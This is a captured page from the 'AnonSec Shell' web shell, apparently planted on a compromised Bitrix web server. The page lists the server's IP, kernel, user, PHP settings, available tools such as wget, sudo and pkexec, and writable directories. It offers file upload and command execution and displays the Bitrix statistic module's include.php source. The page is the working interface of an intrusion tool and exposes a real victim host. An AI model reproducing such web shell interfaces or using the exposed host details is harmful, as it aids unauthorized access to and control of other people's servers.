AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.143.204.127
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/statistic/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/statistic/include.php
<?php

$DB_test = CDatabase::GetModuleConnection('statistic', true);
if(!is_object($DB_test))
{
	return false;
}

IncludeModuleLangFile(__FILE__);

require_once $_SERVER['DOCUMENT_ROOT'] . '/bitrix/modules/main/filter_tools.php';
require_once $_SERVER['DOCUMENT_ROOT'] . '/bitrix/modules/statistic/stat_tools.php';
require_once $_SERVER['DOCUMENT_ROOT'] . '/bitrix/modules/statistic/ip_tools.php';
/*patchlimitationmutatormark1*/
$dbType = mb_strtolower($DB_test->type);
CModule::AddAutoloadClasses(
	'statistic',
	[
		'CKeepStatistics' => 'classes/general/keepstatistic.php',
		'CAllStatistics' => 'classes/general/statistic.php',
		'CStatistics' => 'classes/' . $dbType . '/statistic.php',
		'CAdv' => 'classes/' . $dbType . '/adv.php',
		'CGuest' => 'classes/' . $dbType . '/guest.php',
		'CTraffic' => 'classes/' . $dbType . '/traffic.php',
		'CUserOnline' => 'classes/' . $dbType . '/useronline.php',
		'CStoplist' => 'classes/' . $dbType . '/stoplist.php',
		'CHit' => 'classes/general/hit.php',
		'CSession' => 'classes/' . $dbType . '/session.php',
		'CReferer' => 'classes/general/referer.php',
		'CPhrase' => 'classes/general/phrase.php',
		'CSearcher' => 'classes/' . $dbType . '/searcher.php',
		'CSearcherHit' => 'classes/general/searcherhit.php',
		'CPage' => 'classes/' . $dbType . '/page.php',
		'CStatEvent' => 'classes/' . $dbType . '/statevent.php',
		'CStatEventType' => 'classes/' . $dbType . '/stateventtype.php',
		'CAutoDetect' => 'classes/' . $dbType . '/autodetect.php',
		'CCountry' => 'classes/general/country.php',
		'CCity' => 'classes/general/city.php',
		'CStatRegion' => 'classes/general/city.php',
		'CCityLookup' => 'classes/general/city.php',
		'CCityLookup_geoip_mod' => 'tools/geoip_mod.php',
		'CCityLookup_geoip_extension' => 'tools/geoip_extension.php',
		'CCityLookup_geoip_pure' => 'tools/geoip_pure.php',
		'CCityLookup_stat_table' => 'tools/stat_table.php',
		'CPath' => 'classes/general/path.php',

		'CStat' => 'classes/general/statistic_old.php',
		'CVisit' => 'classes/general/statistic_old.php',
		'CStatCountry' => 'classes/general/statistic_old.php',
		'CAllStatistic' => 'classes/general/statistic_old.php',
		'CStatistic' => 'classes/general/statistic_old.php',
		'CStatResult' => 'classes/general/statresult.php',
		'statistic' => 'install/index.php',
	]
);

Anon7 - 2022
AnonSec Team